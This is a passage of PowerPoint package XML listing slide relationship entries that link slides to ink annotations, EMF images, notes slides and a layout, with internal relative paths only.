Target="../ink/ink55.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink52.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image53.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink54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1.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink962.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink964.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image523.emf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0.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink966.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink963.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image522.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image519.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink965.xml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6.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink972.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image531.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink967.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink969.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image528.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink974.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide148.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image530.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image53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5.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink971.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink968.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink973.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image527.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink975.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image524.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink970.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image529.emf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5.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink976.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink978.xml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4.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink977.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image536.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image533.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink979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980.xml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7.emf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81.xml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8.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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1.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink987.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image546.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink982.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink991.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink984.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image543.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink989.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide152.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image545.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image54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0.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink986.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink983.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink988.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image542.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink990.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image539.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink985.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image544.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image548.emf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1.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink997.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image556.emf"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4730.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink992.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1001.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink994.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image553.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink999.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1003.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide153.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image555.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55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emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink996.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image559.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink993.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink998.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1002.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image552.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1000.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image549.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink995.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image554.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image558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1.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink100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customXml" Target="../ink/ink56.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink5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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink57.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink59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G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73.emf"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink66.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.emf"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image78.emf"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink79.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image82.emf"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink83.xml"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink87.xml"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image88.emf"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink91.xml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68.emf"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink70.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink61.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image72.emf"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image76.emf"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink74.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.emf"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink78.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink82.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2112.emf"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.emf"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91.emf"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink86.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink65.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71.emf"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink69.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75.emf"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink73.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink77.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.emf"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image85.emf"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image86.emf"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink90.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink81.xml"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image90.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink60.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink64.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink68.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink72.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image64.emf"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image80.emf"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink85.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink89.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.emf"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink76.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84.emf"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.emf"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.emf"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink63.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink67.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image74.emf"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.emf"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink80.xml"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink84.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image65.emf"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink71.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.emf"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.emf"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2310.emf"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink88.xml"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink92.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink62.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.emf"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink75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05.xml"/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30.emf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12.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1006.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1008.xml"/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40.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1007.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46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09.xml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1.emf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0.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink93.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink95.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81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2.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink97.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink94.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image800.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7710.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink96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80.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1010.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1012.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5700.emf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70.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1014.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1011.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5690.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5660.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1013.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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30.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1020.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image580.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1015.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1024.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1017.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image577.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1022.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide195.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image579.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58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20.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1019.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1016.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1021.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5740.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1023.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5711.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1018.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image578.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image582.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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90.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1025.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1027.xml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80.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1026.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5800.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5770.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink102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03.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image102.emf"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image106.emf"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink107.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image110.emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink100.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image99.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink105.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink109.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink113.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image830.emf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide20.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image101.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image103.emf"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1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emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink102.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image105.emf"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image109.emf"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink115.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink99.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink104.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink108.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image107.emf"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image820.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image98.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink106.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink112.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink101.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image100.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image104.emf"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink110.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image108.emf"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink114.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image97.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink98.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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3.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1034.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5631.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1029.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1031.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image585.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1036.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide197.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56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20.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1033.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1030.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1035.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image584.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5810.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1032.xml"/><Relationship Id="rId14" 